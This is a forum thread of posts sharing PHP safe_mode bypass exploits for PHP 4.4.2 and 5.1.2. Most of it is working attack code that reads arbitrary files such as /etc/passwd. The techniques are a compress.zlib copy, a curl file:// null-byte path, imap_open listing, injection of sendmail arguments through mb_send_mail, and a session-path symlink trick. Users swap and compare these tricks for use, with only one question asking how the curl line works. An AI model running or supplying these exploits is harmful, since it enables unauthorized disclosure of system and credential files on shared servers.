Latest posts for the topic "PHP 4.4.2 and PHP 5.1.2 Safe Mode Bypass"

PHP 4.4.2 and PHP 5.1.2 Safe Mode Bypass Code:
<?php
/*
Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2
by Maksymilian Arciemowicz SecurityReason.Com
cxib [at] securityreason [dot] com and max [at] jestsuper [dot] pl
pozdro sp3x
*/


$file=""; // File to Include... or use _GET _POST
$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp



echo "<PRE>\n";
if(empty($file)){
if(empty($_GET['file'])){
if(empty($_POST['file'])){
die("\nSet varibles \$tymczas, \$file or use for varible file POST, GET like
?file=/etc/passwd\n <B><CENTER><FONT
COLOR=\"RED\">SecurityReason.Com
Exploit</FONT></CENTER></B>");
} else {
$file=$_POST['file'];
}
} else {
$file=$_GET['file'];
}
}

$temp=tempnam($tymczas, "cx");

if(copy("compress.zlib://".$file, $temp)){
$zrodlo = fopen($temp, "r");
$tekst = fread($zrodlo, filesize($temp));
fclose($zrodlo);
echo "<B>--- Start File ".htmlspecialchars($file)."
-------------</B>\n".htmlspecialchars($tekst)."\n<B>--- End File
".htmlspecialchars($file)." ---------------\n";
unlink($temp);
die("\n<FONT COLOR=\"RED\"><B>File
".htmlspecialchars($file)." has been already loaded. SecurityReason Team
;]</B></FONT>");
} else {
die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
<B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
access.</CENTER></FONT>");
}
?>
PHP 4.4.2 and PHP 5.1.2 Safe Mode Bypass Code:
<?
$ch =
curl_init("file:///etc/passwd\x00/../../../../../../../../../../../../".__FILE__);
curl_exec($ch);
var_dump(curl_exec($ch));
?>
PHP 4.4.2 and PHP 5.1.2 Safe Mode Bypass Code:
<form action="" method="post">
<select name="switch">
<option selected="selected" value="file">View file</option>
<option value="dir">View dir</option>
</select>
<input type="text" size="60" name="string">
<input type="submit" value="go">
</form>

<?php
$string = !empty($_POST['string']) ? $_POST['string'] : 0;
$switch = !empty($_POST['switch']) ? $_POST['switch'] : 0;

if ($string && $switch == "file") {
$stream = imap_open($string, "", "");
if ($stream == FALSE)
die("Can't open imap stream");

$str = imap_body($stream, 1);
if (!empty($str))
echo "<pre>".$str."</pre>";
imap_close($stream);
} elseif ($string && $switch == "dir") {
$stream = imap_open("/etc/passwd", "", "");
if ($stream == FALSE)
die("Can't open imap stream");

$string = explode("|",$string);
if (count($string) > 1)
$dir_list = imap_list($stream, trim($string[0]), trim($string[1]));
else
$dir_list = imap_list($stream, trim($string[0]), "*");
echo "<pre>";
for ($i = 0; $i < count($dir_list); $i++)
echo "$dir_list[$i]\n";
echo "</pre>";
imap_close($stream);
}
?>
PHP 4.4.2 and PHP 5.1.2 Safe Mode Bypass
<?php
$rek= "hehehehe";
if (file_exists($rek)) unlink($rek);
$file = "/etc/passwd";
$xploit = "-C ".$file." -X ".getcwd()."/".$rek;
mb_send_mail(NULL, NULL, NULL, NULL, $xploit);
echo "<pre>".file_get_contents($file)."</pre>";
?>

PHP 4.4.2 and PHP 5.1.2 Safe Mode Bypass
1) Make the following script:
<?php
ini_set("session.save_path","/path/where/sess_foo/symlink/is/");
session_start();
$_SESSION['bar'] = "bar";
session_write_close();
?>
2) Call this script with ?PHPSESSID=foo

Re: PHP 4.4.2 and PHP 5.1.2 Safe Mode Bypass

hackernohat wrote:
Hehe, I have a way that's even simpler than luke's: readfile("/etc/passwd"); It takes on Safe_mode too, because this is a fairly common function for reading files, so few servers dare to block it :mrgreen:
So you haven't seen the coffin yet :evil: On plenty of servers, using readfile gets you nowhere either.
PHP 4.4.2 and PHP 5.1.2 Safe Mode Bypass

baothu wrote:
Here's another one, via CURL Code:
<?
$ch =
curl_init("file:///etc/passwd\x00/../../../../../../../../../../../../".__FILE__);
curl_exec($ch);
var_dump(curl_exec($ch));
?>
 
Could you analyze this code in detail? Why use this: Code:
curl_init("file:///etc/passwd\x00/../../../../../../../../../../../../".__FILE__);
and not this: Code:
curl_init("file://etc/passwd\x00/../../../../../../../../../../../../".__FILE__);
or this: Code:
curl_init("file:///etc/passwd/../../../../../../../../../../../../".__FILE__);
Could you explain it clearly for me??? I don't really understand it even though I've read the documentation.